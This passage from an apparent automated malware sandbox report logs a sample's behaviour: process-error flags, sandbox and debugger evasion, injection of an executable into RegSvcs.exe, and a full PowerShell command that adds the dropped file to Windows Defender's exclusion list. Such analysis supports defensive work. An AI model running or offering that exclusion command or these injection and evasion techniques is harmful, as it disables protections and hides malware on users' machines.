              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: aWBoUwiux.exe PID: 5572, type: MEMORYSTR
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeMemory allocated: 1400000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeMemory allocated: 3030000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeMemory allocated: 9190000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeMemory allocated: A190000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeMemory allocated: A390000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeMemory allocated: B390000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeMemory allocated: 2900000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeMemory allocated: 84F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeMemory allocated: 94F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeMemory allocated: 96E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeMemory allocated: A6E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7593Jump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe TID: 4956Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2508Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1960Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,8_2_00403D74
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 60000Jump to behavior
              Source: aWBoUwiux.exe, 00000009.00000002.2501621888.0000000000B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:(iwq4iwqDD
              Source: RegSvcs.exe, 00000008.00000002.2395618749.0000000001288000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040317B mov eax, dword ptr fs:[00000030h]8_2_0040317B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00402B7C GetProcessHeap,RtlAllocateHeap,8_2_00402B7C
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe"
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe"Jump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
